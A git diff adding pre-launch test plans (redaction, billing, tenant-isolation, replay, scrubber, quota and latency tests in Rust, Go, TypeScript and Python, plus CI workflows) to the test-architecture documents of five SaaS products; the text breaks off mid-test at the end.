diff --git a/products/01-llm-cost-router/test-architecture/test-architecture.md b/products/01-llm-cost-router/test-architecture/test-architecture.md index 37b9b05..dd7d1de 100644 --- a/products/01-llm-cost-router/test-architecture/test-architecture.md +++ b/products/01-llm-cost-router/test-architecture/test-architecture.md @@ -2551,3 +2551,167 @@ async fn panic_mode_allowed_for_owner_role() { ``` *End of P1 Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 API Key Redaction in Panic Traces + +```rust +// tests/security/key_redaction_test.rs + +#[test] +fn panic_handler_redacts_bearer_tokens_from_stack_trace() { + // Simulate a panic inside the proxy handler while processing a request + // with Authorization: Bearer sk-live-abc123 + let result = std::panic::catch_unwind(|| { + process_request_with_panic("Bearer sk-live-abc123"); + }); + assert!(result.is_err()); + + // Capture the panic message + let panic_msg = get_last_panic_message(); + assert!(!panic_msg.contains("sk-live-abc123"), + "Panic trace contains raw API key!"); + assert!(panic_msg.contains("[REDACTED]") || !panic_msg.contains("sk-")); +} + +#[test] +fn error_log_redacts_provider_api_keys() { + // Simulate an upstream error that includes the provider key in the response + let error_body = r#"{"error": "Invalid API key: sk-proj-abc123xyz"}"#; + let sanitized = redact_sensitive_fields(error_body); + assert!(!sanitized.contains("sk-proj-abc123xyz")); +} + +#[test] +fn telemetry_event_never_contains_raw_api_key() { + let event = create_telemetry_event("Bearer sk-live-secret", "gpt-4o", 100, 50); + let serialized = serde_json::to_string(&event).unwrap(); + assert!(!serialized.contains("sk-live-secret")); + assert!(!serialized.contains("Bearer")); +} +``` + +### 12.2 SSE Billing Leak Prevention (Expanded) + +```rust +#[tokio::test] +async fn sse_disconnect_bills_only_streamed_tokens() { + let stack = E2EStack::start().await; + let mock = 
stack.mock_provider(); + + // Provider will stream 100 tokens at 1/sec + mock.configure_slow_stream(100, Duration::from_millis(100)); + + // Client reads 10 tokens then disconnects + let mut stream = stack.proxy_stream(&chat_request_streaming()).await; + let mut received = 0; + while let Some(chunk) = stream.next().await { + received += count_tokens_in_chunk(&chunk); + if received >= 10 { break; } + } + drop(stream); + + tokio::time::sleep(Duration::from_millis(500)).await; + + // Billing must reflect only streamed tokens + let usage = stack.get_last_usage_record().await; + assert!(usage.completion_tokens <= 15, // small buffer for in-flight + "Billed {} tokens but only streamed ~10", usage.completion_tokens); + + // Provider connection must be aborted + assert_eq!(mock.active_connections(), 0); +} + +#[tokio::test] +async fn sse_disconnect_during_prompt_processing_bills_zero_completion() { + // Client disconnects before any completion tokens are generated + // (provider is still processing the prompt) + let stack = E2EStack::start().await; + let mock = stack.mock_provider(); + mock.configure_delay_before_first_token(Duration::from_secs(5)); + + let stream = stack.proxy_stream(&chat_request_streaming()).await; + tokio::time::sleep(Duration::from_millis(100)).await; + drop(stream); // Disconnect before first token + + let usage = stack.get_last_usage_record().await; + assert_eq!(usage.completion_tokens, 0); + // Prompt tokens may still be billed (provider processed them) +} +``` + +### 12.3 Token Calculation Edge Cases + +```rust +#[test] +fn tokenizer_handles_unicode_emoji_correctly() { + // cl100k_base tokenizes emoji differently than ASCII + let text = "Hello 🌍πŸ”₯ world"; + let tokens = count_tokens_cl100k(text); + assert!(tokens > 3); // Emoji take multiple tokens +} + +#[test] +fn tokenizer_handles_cjk_characters() { + let text = "δ½ ε₯½δΈ–η•Œ"; + let tokens = count_tokens_cl100k(text); + assert!(tokens >= 4); // Each CJK char is typically 1+ tokens +} + 
+
#[test]
fn cost_calculation_matches_provider_billing() {
    // Property test: our token count * rate must match what the provider reports
    // within a 1% tolerance (tokenizer version differences)
    fc::assert(fc::property(
        fc::string_of(fc::any::<char>(), 1..1000),
        |text| {
            let our_count = count_tokens_cl100k(&text);
            let provider_count = mock_provider_token_count(&text);
            if provider_count == 0 {
                // Avoid divide-by-zero: both tokenizers must agree the text is empty
                return our_count == 0;
            }
            let diff = (our_count as f64 - provider_count as f64).abs();
            diff / provider_count as f64 <= 0.01
        }
    ));
}

#[test]
fn anthropic_tokenizer_differs_from_openai() {
    // Same text, different token counts — billing must use the correct tokenizer
    let text = "The quick brown fox jumps over the lazy dog";
    let openai_tokens = count_tokens_cl100k(text);
    let anthropic_tokens = count_tokens_claude(text);
    // They WILL differ — verify we use the right one per provider
    assert_ne!(openai_tokens, anthropic_tokens);
}
```
 + +### 12.4 Dedicated CI Runner for Latency Benchmarks + +```yaml
# .github/workflows/benchmark.yml
# Runs on self-hosted runner (Brian's NAS) — not shared GitHub Actions
name: Latency Benchmark
on:
  push:
    branches: [main]
    paths: ['src/proxy/**']

jobs:
  benchmark:
    runs-on: self-hosted # Brian's NAS with consistent CPU
    steps:
      - uses: actions/checkout@v4
      - name: Run proxy latency benchmark
        run: cargo bench --bench proxy_latency
      - name: Assert median latency < 5ms
        run: |
          # NOTE(review): criterion's estimates.json exposes mean/median, not P99.
          # Gate on the median here; a true P99 gate needs the raw sample data
          # (target/criterion/.../sample.json) or a custom benchmark harness.
          MEDIAN=$(jq '.median.point_estimate' target/criterion/proxy_overhead/new/estimates.json)
          if (( $(echo "$MEDIAN > 5000000" | bc -l) )); then
            echo "Median latency ${MEDIAN}ns exceeds 5ms budget"
            exit 1
          fi
```
 + +*End of P1 BMad Implementation* diff --git a/products/02-iac-drift-detection/test-architecture/test-architecture.md b/products/02-iac-drift-detection/test-architecture/test-architecture.md index 113245d..4c44472 100644 --- a/products/02-iac-drift-detection/test-architecture/test-architecture.md +++ b/products/02-iac-drift-detection/test-architecture/test-architecture.md @@ 
-2094,3 +2094,208 @@ Per review recommendation, cap E2E at 10 critical paths. Remaining 40 tests push | E2E/Smoke | 10% (~50) | 7% (~35) | Capped at 10 true E2E + 25 Playwright UI tests | *End of P2 Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 mTLS Revocation β€” Instant Lockout + +```go +// tests/integration/mtls_revocation_test.go + +func TestRevokedCert_ExistingConnectionDropped(t *testing.T) { + // 1. Agent connects with valid cert + agent := connectAgentWithCert(t, validCert) + assert.True(t, agent.IsConnected()) + + // 2. Revoke the cert via CRL update + revokeCert(t, validCert.SerialNumber) + + // 3. Force CRL refresh on SaaS (< 30 seconds) + triggerCRLRefresh(t) + + // 4. Existing connection must be terminated + time.Sleep(5 * time.Second) + assert.False(t, agent.IsConnected(), + "Revoked agent still has active mTLS connection β€” cached session not cleared") +} + +func TestRevokedCert_NewConnectionRejected(t *testing.T) { + revokeCert(t, validCert.SerialNumber) + triggerCRLRefresh(t) + + _, err := connectAgentWithCert(t, validCert) + assert.Error(t, err) + assert.Contains(t, err.Error(), "certificate revoked") +} + +func TestPayloadReplay_RejectedByNonce(t *testing.T) { + // Capture a legitimate drift report + report := captureValidDriftReport(t) + + // Replay it + resp := postDriftReport(t, report) + assert.Equal(t, 409, resp.StatusCode) // Conflict β€” nonce already used +} +``` + +### 12.2 Terraform State Lock Recovery on Panic + +```go +// tests/integration/remediation_panic_test.go + +func TestPanicMode_ReleasesTerraformStateLock(t *testing.T) { + // 1. Start a remediation (terraform apply) + execID := startRemediation(t, "stack-1", "drift-1") + waitForState(t, execID, "applying") + + // 2. Verify state lock is held + lockInfo := getTerraformStateLock(t, "stack-1") + assert.NotNil(t, lockInfo, "State lock should be held during apply") + + // 3. 
Trigger panic mode
    triggerPanicMode(t)

    // 4. Wait for agent to abort
    waitForState(t, execID, "aborted")

    // 5. State lock MUST be released
    lockInfo = getTerraformStateLock(t, "stack-1")
    assert.Nil(t, lockInfo,
        "Terraform state lock not released after panic — infrastructure is now in zombie state")
}

func TestPanicMode_AgentRunsTerraformForceUnlock(t *testing.T) {
    // If normal unlock fails, agent must run `terraform force-unlock`
    execID := startRemediation(t, "stack-1", "drift-1")
    waitForState(t, execID, "applying")

    // Simulate lock that can't be released normally
    corruptStateLock(t, "stack-1")
    triggerPanicMode(t)

    // Agent should attempt force-unlock
    logs := getAgentLogs(t)
    assert.Contains(t, logs, "terraform force-unlock")
}
```
 + +### 12.3 RLS Connection Pool Leak Test + +```go
// tests/integration/rls_pool_leak_test.go

func TestPgBouncer_ClearsTenantContext_BetweenRequests(t *testing.T) {
    t.Parallel()

    // 1. Request as Tenant A — sets SET LOCAL app.tenant_id = 'tenant-a'
    respA := apiRequest(t, tenantAToken, "GET", "/v1/stacks")
    assert.Equal(t, 200, respA.StatusCode)
    stacksA := parseStacks(respA)

    // 2. Immediately request as Tenant B on same PgBouncer connection
    respB := apiRequest(t, tenantBToken, "GET", "/v1/stacks")
    assert.Equal(t, 200, respB.StatusCode)
    stacksB := parseStacks(respB)

    // 3. 
Tenant B must NOT see Tenant A's stacks + for _, stack := range stacksB { + assert.NotEqual(t, "tenant-a", stack.TenantID, + "CRITICAL: Tenant B received Tenant A's data β€” PgBouncer leaked context") + } +} + +func TestRLS_100ConcurrentTenants_NoLeakage(t *testing.T) { + // Stress test: 100 concurrent requests from different tenants + var wg sync.WaitGroup + violations := make(chan string, 100) + + for i := 0; i < 100; i++ { + wg.Add(1) + go func(tenantID string) { + defer wg.Done() + token := createTenantToken(t, tenantID) + resp := apiRequest(t, token, "GET", "/v1/stacks") + stacks := parseStacks(resp) + for _, s := range stacks { + if s.TenantID != tenantID { + violations <- fmt.Sprintf("Tenant %s saw data from %s", tenantID, s.TenantID) + } + } + }(fmt.Sprintf("tenant-%d", i)) + } + wg.Wait() + close(violations) + + for v := range violations { + t.Fatal("CROSS-TENANT LEAK:", v) + } +} +``` + +### 12.4 Secret Scrubber Entropy Scanning + +```go +// pkg/agent/scrubber/entropy_test.go + +func TestEntropyScan_DetectsBase64EncodedAWSKey(t *testing.T) { + // AWS key base64-encoded inside a JSON block + input := `{"config": "` + base64.StdEncoding.EncodeToString([]byte("AKIAIOSFODNN7EXAMPLE")) + `"}` + result := scrubber.Scrub(input) + assert.NotContains(t, result, "AKIAIOSFODNN7EXAMPLE") +} + +func TestEntropyScan_DetectsMultiLineRSAKey(t *testing.T) { + input := `-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy5AhJPnUfGqlTlGa... 
+-----END RSA PRIVATE KEY-----` + result := scrubber.Scrub(input) + assert.Contains(t, result, "[REDACTED RSA KEY]") +} + +func TestEntropyScan_DetectsHighEntropyCustomToken(t *testing.T) { + // 40-char hex string that looks like a custom API token + token := "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0" + input := fmt.Sprintf(`{"api_token": "%s"}`, token) + result := scrubber.Scrub(input) + // Shannon entropy > 3.5 bits/char should trigger redaction + assert.NotContains(t, result, token) +} + +func TestEntropyScan_DoesNotRedactNormalText(t *testing.T) { + input := `{"message": "Hello world, this is a normal log message"}` + result := scrubber.Scrub(input) + assert.Equal(t, input, result) // No false positives +} +``` + +### 12.5 pgmq Visibility Timeout for Long Scans + +```go +// tests/integration/pgmq_visibility_test.go + +func TestPgmq_LongScan_DoesNotTriggerDuplicateProcessing(t *testing.T) { + // Simulate a scan that takes 5 minutes + queue := setupPgmqQueue(t) + + // Enqueue a drift report + queue.Send(t, makeDriftReport("stack-1")) + + // Consumer 1 picks it up with 2-minute visibility timeout + msg := queue.Read(t, 120) // 120s visibility + assert.NotNil(t, msg) + + // Simulate long processing (extend visibility) + for i := 0; i < 3; i++ { + time.Sleep(90 * time.Second) + queue.ExtendVisibility(t, msg.ID, 120) // Extend by another 2 min + } + + // Consumer 2 should NOT get the same message + msg2 := queue.Read(t, 120) + assert.Nil(t, msg2, "pgmq handed job to second worker while first was still processing") +} +``` + +*End of P2 BMad Implementation* diff --git a/products/03-alert-intelligence/test-architecture/test-architecture.md b/products/03-alert-intelligence/test-architecture/test-architecture.md index 4949f86..afadd6f 100644 --- a/products/03-alert-intelligence/test-architecture/test-architecture.md +++ b/products/03-alert-intelligence/test-architecture/test-architecture.md @@ -1865,3 +1865,227 @@ describe('Slack Notification Circuit Breaker', () => { | 
E2E | 10% (~20) | 10% (~28) | Dashboard UI (Playwright), onboarding flow | *End of P3 Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 HMAC Timestamp Freshness (Replay Attack Prevention) + +```typescript +describe('HMAC Replay Attack Prevention', () => { + it('rejects Datadog webhook with timestamp older than 5 minutes', async () => { + const payload = makeDatadogPayload(); + const staleTimestamp = Math.floor(Date.now() / 1000) - 301; // 5min + 1s + const sig = computeDatadogHMAC(payload, staleTimestamp); + + const resp = await ingest(payload, { + 'dd-webhook-timestamp': staleTimestamp.toString(), + 'dd-webhook-signature': sig, + }); + expect(resp.status).toBe(401); + expect(resp.body.error).toContain('stale timestamp'); + }); + + it('rejects PagerDuty webhook with missing timestamp', async () => { + const payload = makePagerDutyPayload(); + const sig = computePagerDutyHMAC(payload); + + const resp = await ingest(payload, { + 'x-pagerduty-signature': sig, + // No timestamp header + }); + expect(resp.status).toBe(401); + }); + + it('rejects OpsGenie webhook replayed after 5 minutes', async () => { + // OpsGenie doesn't always package timestamp cleanly + // Must extract from payload body and validate + const payload = makeOpsGeniePayload({ timestamp: fiveMinutesAgo() }); + const sig = computeOpsGenieHMAC(payload); + + const resp = await ingest(payload, { 'x-opsgenie-signature': sig }); + expect(resp.status).toBe(401); + }); + + it('accepts fresh webhook within 5-minute window', async () => { + const payload = makeDatadogPayload(); + const freshTimestamp = Math.floor(Date.now() / 1000); + const sig = computeDatadogHMAC(payload, freshTimestamp); + + const resp = await ingest(payload, { + 'dd-webhook-timestamp': freshTimestamp.toString(), + 'dd-webhook-signature': sig, + }); + expect(resp.status).toBe(200); + }); +}); +``` + +### 12.2 Cross-Tenant Negative Isolation Tests + +```typescript +describe('DynamoDB 
Tenant Isolation (Negative Tests)', () => { + it('Tenant A cannot read Tenant B incidents', async () => { + // Seed data for both tenants + await createIncident('tenant-a', { title: 'A incident' }); + await createIncident('tenant-b', { title: 'B incident' }); + + // Query as Tenant A + const results = await dao.listIncidents('tenant-a'); + + // Explicitly assert Tenant B data is absent + const tenantIds = results.map(r => r.tenantId); + expect(tenantIds).not.toContain('tenant-b'); + expect(results.every(r => r.tenantId === 'tenant-a')).toBe(true); + }); + + it('Tenant A cannot read Tenant B analytics', async () => { + await seedAnalytics('tenant-a', { alertCount: 100 }); + await seedAnalytics('tenant-b', { alertCount: 200 }); + + const analytics = await dao.getAnalytics('tenant-a'); + expect(analytics.alertCount).toBe(100); // Not 300 (combined) + }); + + it('API returns 404 (not 403) for cross-tenant incident access', async () => { + const incident = await createIncident('tenant-b', { title: 'secret' }); + + const resp = await api.get(`/v1/incidents/${incident.id}`) + .set('Authorization', `Bearer ${tenantAToken}`); + + // 404 not 403 β€” don't leak existence + expect(resp.status).toBe(404); + }); +}); +``` + +### 12.3 Correlation Window Edge Cases + +```typescript +describe('Out-of-Order Alert Delivery', () => { + it('late alert attaches to existing incident (not duplicate)', async () => { + const clock = new FakeClock(); + const engine = new CorrelationEngine(new InMemoryWindowStore(), clock); + + // Alert 1 arrives at T=0 + const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 0 }); + const incident1 = await engine.process(alert1); + + // Window closes at T=5min, incident shipped + clock.advanceBy(5 * 60 * 1000); + await engine.flushWindows(); + + // Late alert arrives at T=6min with timestamp T=2min (within original window) + const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 2 * 60 * 1000 }); + const 
result = await engine.process(lateAlert); + + // Must attach to existing incident, not create new one + expect(result.incidentId).toBe(incident1.incidentId); + expect(result.action).toBe('attached_to_existing'); + }); + + it('very late alert (>2x window) creates new incident', async () => { + const clock = new FakeClock(); + const engine = new CorrelationEngine(new InMemoryWindowStore(), clock); + + const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high' }); + const incident1 = await engine.process(alert1); + + // 15 minutes later (3x the 5-min window) + clock.advanceBy(15 * 60 * 1000); + + const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high' }); + const result = await engine.process(lateAlert); + + expect(result.incidentId).not.toBe(incident1.incidentId); + expect(result.action).toBe('new_incident'); + }); +}); +``` + +### 12.4 SQS Claim-Check Round-Trip + +```typescript +describe('SQS 256KB Claim-Check End-to-End', () => { + it('large payload round-trips through S3 pointer', async () => { + const largePayload = makeLargeAlertPayload(300 * 1024); // 300KB + + // Ingestion compresses and stores in S3 + const resp = await ingest(largePayload); + expect(resp.status).toBe(200); + + // SQS message contains S3 pointer + const sqsMsg = await getLastSQSMessage(localstack, 'alert-queue'); + const body = JSON.parse(sqsMsg.Body); + expect(body.s3Pointer).toBeDefined(); + + // Correlation engine fetches from S3 and processes + const incident = await waitForIncidentCreated(5000); + expect(incident).toBeDefined(); + expect(incident.sourceAlertCount).toBeGreaterThan(0); + }); + + it('S3 fetch timeout does not crash correlation engine', async () => { + // Inject S3 latency (10 second delay) + mockS3.setLatency(10000); + + const largePayload = makeLargeAlertPayload(300 * 1024); + await ingest(largePayload); + + // Correlation engine should timeout and send to DLQ + const dlqMsg = await getDLQMessage(localstack, 'alert-dlq', 15000); + 
expect(dlqMsg).toBeDefined();

    // Engine is still healthy
    const health = await api.get('/health');
    expect(health.status).toBe(200);
  });
});
```
 + +### 12.5 Free Tier Enforcement + +```typescript
describe('Free Tier (10K alerts/month, 7-day retention)', () => {
  it('accepts alert at 9,999 count', async () => {
    await setAlertCounter('tenant-free', 9999);
    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(200);
  });

  it('rejects alert at 10,001 with upgrade prompt', async () => {
    await setAlertCounter('tenant-free', 10000);
    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(429);
    expect(resp.body.upgrade_url).toContain('stripe');
  });

  it('counter resets on first of month', async () => {
    await setAlertCounter('tenant-free', 10000);
    clock.advanceToFirstOfNextMonth();
    await runMonthlyReset();

    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(200);
  });

  it('purges data older than 7 days on free tier', async () => {
    await createIncident('tenant-free', { createdAt: eightDaysAgo() });
    await runRetentionPurge();

    const incidents = await dao.listIncidents('tenant-free');
    expect(incidents).toHaveLength(0);
  });

  it('retains data for 90 days on pro tier', async () => {
    await createIncident('tenant-pro', { createdAt: thirtyDaysAgo() });
    await runRetentionPurge();

    const incidents = await dao.listIncidents('tenant-pro');
    expect(incidents).toHaveLength(1);
  });
});
```
 + +*End of P3 BMad Implementation* diff --git a/products/04-lightweight-idp/test-architecture/test-architecture.md b/products/04-lightweight-idp/test-architecture/test-architecture.md index 9fdbc24..f225d92 100644 --- a/products/04-lightweight-idp/test-architecture/test-architecture.md +++ b/products/04-lightweight-idp/test-architecture/test-architecture.md @@ -1265,3 +1265,225 @@ def 
test_meilisearch_index_rebuild_does_not_drop_search(): # Verify zero-downtime index swapping during mapping updates pass ``` + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 Discovery Scan Timeout / Partial Failure Recovery + +```python +# tests/integration/test_discovery_resilience.py + +def test_partial_aws_scan_does_not_delete_existing_services(): + """If AWS scanner times out after discovering 500 of 1000 resources, + existing catalog entries must NOT be marked stale or deleted.""" + + # Seed catalog with 1000 services + seed_catalog(count=1000) + + # Simulate scanner timeout after 500 resources + with mock_aws_timeout_after(500): + result = run_aws_discovery_scan() + + assert result.status == "partial_failure" + assert result.discovered == 500 + + # All 1000 services must still exist in catalog + services = catalog_api.list_services() + assert len(services) == 1000 # NOT 500 + + # Partial results should be staged, not committed + staged = catalog_api.list_staged_updates() + assert len(staged) == 500 + +def test_partial_github_scan_does_not_corrupt_ownership(): + """If GitHub scanner hits rate limit mid-scan, existing ownership + mappings must be preserved.""" + + seed_catalog_with_ownership(count=100) + + with mock_github_rate_limit_after(50): + result = run_github_discovery_scan() + + assert result.status == "partial_failure" + + # All 100 ownership mappings intact + services = catalog_api.list_services() + owned = [s for s in services if s.owner is not None] + assert len(owned) == 100 # NOT 50 + +def test_scan_failure_triggers_alert_not_silent_failure(): + result = run_aws_discovery_scan_with_invalid_credentials() + assert result.status == "failed" + + # Must alert the admin + alerts = get_admin_alerts() + assert any("discovery scan failed" in a.message for a in alerts) +``` + +### 12.2 Ownership Conflict Resolution Integration Test + +```python +# tests/integration/test_ownership_conflict.py + +def 
test_explicit_config_overrides_implicit_tag(): + """Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)""" + + # AWS tag says owner is "team-infra" + aws_scanner.discover_service("auth-api", owner_tag="team-infra") + + # GitHub CODEOWNERS says owner is "team-platform" + github_scanner.discover_service("auth-api", codeowners="team-platform") + + # Resolve conflict + service = catalog_api.get_service("auth-api") + assert service.owner == "team-platform" # Explicit wins + assert service.owner_source == "codeowners" + +def test_concurrent_discovery_sources_do_not_race(): + """Two scanners discovering the same service simultaneously + must not create duplicate entries.""" + + import asyncio + + async def run_both(): + await asyncio.gather( + aws_scanner.discover_service_async("billing-api"), + github_scanner.discover_service_async("billing-api"), + ) + + asyncio.run(run_both()) + + services = catalog_api.search("billing-api") + assert len(services) == 1 # No duplicates + +def test_heuristic_ownership_does_not_override_explicit(): + # Explicit owner set via config + catalog_api.set_owner("auth-api", "team-platform", source="config") + + # Heuristic scanner infers different owner from commit history + github_scanner.infer_ownership("auth-api", top_committer="dev@other-team.com") + + service = catalog_api.get_service("auth-api") + assert service.owner == "team-platform" # Explicit preserved +``` + +### 12.3 VCR Cassette Freshness Validation + +```yaml +# .github/workflows/vcr-refresh.yml +# Weekly job to re-record VCR cassettes against real AWS +name: VCR Cassette Freshness +on: + schedule: + - cron: '0 6 * * 1' # Every Monday 6 AM UTC + +jobs: + refresh: + runs-on: self-hosted + steps: + - uses: actions/checkout@v4 + - name: Re-record cassettes + env: + AWS_ACCESS_KEY_ID: ${{ secrets.VCR_AWS_KEY }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.VCR_AWS_SECRET }} + run: | + VCR_RECORD=all pytest tests/integration/scanners/ -v + - name: Diff cassettes + run: | + 
git diff --stat tests/cassettes/ + CHANGED=$(git diff --name-only tests/cassettes/ | wc -l) + if [ "$CHANGED" -gt 0 ]; then + echo "⚠️ $CHANGED cassettes changed β€” AWS API responses have drifted" + echo "Review and commit updated cassettes" + fi + - name: Create PR if cassettes changed + uses: peter-evans/create-pull-request@v6 + with: + title: "chore: refresh VCR cassettes (AWS API drift)" + branch: vcr-refresh +``` + +### 12.4 Meilisearch Zero-Downtime Index Rebuild + +```python +# tests/integration/test_meilisearch_rebuild.py + +def test_search_returns_results_during_index_rebuild(): + """Cmd+K search must work during index rebuild (zero downtime).""" + + # Seed index with 100 services + meili.index("services").add_documents(make_services(100)) + meili.index("services").wait_for_pending_update() + + # Start rebuild (creates services_v2, swaps when ready) + rebuild_task = start_index_rebuild() + + # Search must still work during rebuild + results = meili.index("services").search("auth") + assert len(results["hits"]) > 0 + + # Wait for rebuild to complete + rebuild_task.wait() + + # Search still works after swap + results = meili.index("services").search("auth") + assert len(results["hits"]) > 0 + +def test_index_rebuild_failure_does_not_corrupt_active_index(): + meili.index("services").add_documents(make_services(50)) + + # Simulate rebuild failure (e.g., OOM during indexing) + with mock_meili_oom_during_rebuild(): + result = start_index_rebuild() + + assert result.status == "failed" + + # Active index must be untouched + results = meili.index("services").search("billing") + assert len(results["hits"]) > 0 # Still works +``` + +### 12.5 Cmd+K Search Latency from Redis Cache + +```python +# tests/performance/test_search_latency.py + +def test_cmd_k_search_under_10ms_from_redis(): + """Prefix cache hit must return in <10ms.""" + + # Warm the cache + redis_client.set("search:prefix:auth", json.dumps([ + {"name": "auth-service", "owner": "team-platform"}, + 
{"name": "auth-proxy", "owner": "team-infra"}, + ])) + + import time + start = time.perf_counter_ns() + results = search_api.prefix_search("auth") + elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000 + + assert elapsed_ms < 10, f"Cmd+K search took {elapsed_ms:.1f}ms β€” exceeds 10ms SLA" + assert len(results) == 2 +``` + +### 12.6 Free Tier Enforcement (50 Services) + +```python +def test_free_tier_allows_50_services(): + tenant = create_tenant(tier="free") + for i in range(50): + resp = catalog_api.create_service(tenant, f"service-{i}") + assert resp.status_code == 201 + +def test_free_tier_rejects_51st_service(): + tenant = create_tenant(tier="free") + seed_services(tenant, count=50) + + resp = catalog_api.create_service(tenant, "service-51") + assert resp.status_code == 403 + assert "upgrade" in resp.json()["error"].lower() +``` + +*End of P4 BMad Implementation* diff --git a/products/05-aws-cost-anomaly/test-architecture/test-architecture.md b/products/05-aws-cost-anomaly/test-architecture/test-architecture.md index c379f1c..eef4d38 100644 --- a/products/05-aws-cost-anomaly/test-architecture/test-architecture.md +++ b/products/05-aws-cost-anomaly/test-architecture/test-architecture.md @@ -710,3 +710,198 @@ export const makeBaseline = (overrides) => ({ - CDK definitions, LocalStack event injection, wire everything together. *End of dd0c/cost Test Architecture (v2)* + +--- + +## 12. 
BMad Review Implementation (Must-Have Before Launch) + +### 12.1 Concurrent Baseline Update Conflict Test + +```typescript +describe('Concurrent Baseline Updates (DynamoDB TransactWriteItem)', () => { + it('two simultaneous Lambda invocations converge to correct baseline', async () => { + // Seed baseline: mean=1.00, stddev=0.10, count=20 + await seedBaseline('tenant-1', 'ec2/m5.xlarge', { mean: 1.00, stddev: 0.10, count: 20 }); + + // Two events arrive simultaneously for the same resource type + const event1 = makeCostEvent({ hourlyCost: 1.50 }); + const event2 = makeCostEvent({ hourlyCost: 2.00 }); + + // Process concurrently + const [result1, result2] = await Promise.allSettled([ + processEvent('tenant-1', 'ec2/m5.xlarge', event1), + processEvent('tenant-1', 'ec2/m5.xlarge', event2), + ]); + + // One succeeds, one retries via ConditionalCheckFailed + const successes = [result1, result2].filter(r => r.status === 'fulfilled'); + expect(successes.length).toBe(2); // Both eventually succeed + + // Final baseline must reflect BOTH events + const baseline = await getBaseline('tenant-1', 'ec2/m5.xlarge'); + expect(baseline.count).toBe(22); // 20 + 2 + // Mean should be updated by both observations (order doesn't matter for Welford) + }); + + it('ConditionalCheckFailed triggers retry with fresh baseline read', async () => { + const spy = vi.spyOn(dynamoClient, 'transactWriteItems'); + + // Force a conflict on first attempt + mockConflictOnce(); + + await processEvent('tenant-1', 'ec2/m5.xlarge', makeCostEvent({ hourlyCost: 3.00 })); + + // Should have been called twice (initial + retry) + expect(spy).toHaveBeenCalledTimes(2); + }); +}); +``` + +### 12.2 Remediation RBAC + +```typescript +describe('Remediation Authorization', () => { + it('only account owners can click Stop Instance', async () => { + const ownerAction = makeSlackAction('stop_instance', { userId: 'U_OWNER' }); + const resp = await handleSlackAction(ownerAction); + expect(resp.status).toBe(200); + }); + + 
it('viewer role cannot trigger remediation', async () => { + const viewerAction = makeSlackAction('stop_instance', { userId: 'U_VIEWER' }); + const resp = await handleSlackAction(viewerAction); + expect(resp.status).toBe(403); + expect(resp.body.error).toContain('insufficient permissions'); + }); + + it('user from different Slack workspace cannot trigger remediation', async () => { + const foreignAction = makeSlackAction('stop_instance', { + userId: 'U_FOREIGN', + teamId: 'T_OTHER_WORKSPACE' + }); + const resp = await handleSlackAction(foreignAction); + expect(resp.status).toBe(403); + }); + + it('snooze and mark-expected are allowed for all authenticated users', async () => { + const viewerSnooze = makeSlackAction('snooze_24h', { userId: 'U_VIEWER' }); + const resp = await handleSlackAction(viewerSnooze); + expect(resp.status).toBe(200); + }); +}); +``` + +### 12.3 Clock Interface for Governance Tests + +```typescript +// src/governance/clock.ts +interface Clock { + now(): number; + advanceBy(ms: number): void; +} + +class FakeClock implements Clock { + private current: number; + constructor(start = Date.now()) { this.current = start; } + now() { return this.current; } + advanceBy(ms: number) { this.current += ms; } +} + +describe('14-Day Auto-Promotion (Clock-Injected)', () => { + let clock: FakeClock; + let governance: GovernanceEngine; + + beforeEach(() => { + clock = new FakeClock(new Date('2026-03-01').getTime()); + governance = new GovernanceEngine(clock); + }); + + it('does not promote at day 13', () => { + clock.advanceBy(13 * 24 * 60 * 60 * 1000); + const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 }); + expect(result.promoted).toBe(false); + }); + + it('promotes at day 15 with low FP rate', () => { + clock.advanceBy(15 * 24 * 60 * 60 * 1000); + const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 }); + expect(result.promoted).toBe(true); + expect(result.newMode).toBe('audit'); + }); + + it('does not promote at day 
15 with high FP rate', () => { + clock.advanceBy(15 * 24 * 60 * 60 * 1000); + const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.15 }); + expect(result.promoted).toBe(false); + expect(result.reason).toContain('false-positive rate'); + }); +}); +``` + +### 12.4 Property-Based Tests with 10K Runs + +```typescript +describe('Anomaly Scorer (fast-check, 10K runs)', () => { + it('score is always between 0 and 100', () => { + fc.assert( + fc.property( + fc.record({ + cost: fc.float({ min: 0, max: 10000, noNaN: true }), + mean: fc.float({ min: 0, max: 10000, noNaN: true }), + stddev: fc.float({ min: 0, max: 1000, noNaN: true }), + }), + (input) => { + const score = scorer.score(input); + return score >= 0 && score <= 100; + } + ), + { numRuns: 10000, seed: 42 } // Reproducible + ); + }); + + it('score monotonically increases as cost increases', () => { + fc.assert( + fc.property( + fc.float({ min: 0, max: 100, noNaN: true }), + fc.float({ min: 0, max: 100, noNaN: true }), + fc.float({ min: 0.01, max: 50, noNaN: true }), + (costA, costB, stddev) => { + const baseline = { mean: 5.0, stddev }; + const scoreA = scorer.score({ cost: Math.min(costA, costB), ...baseline }); + const scoreB = scorer.score({ cost: Math.max(costA, costB), ...baseline }); + return scoreB >= scoreA; + } + ), + { numRuns: 10000, seed: 42 } + ); + }); +}); +``` + +### 12.5 Redis Failure During Panic Mode Check + +```typescript +describe('Panic Mode Redis Failure', () => { + it('defaults to panic=active (safe) when Redis is unreachable', async () => { + // Kill Redis connection + await redis.disconnect(); + + const 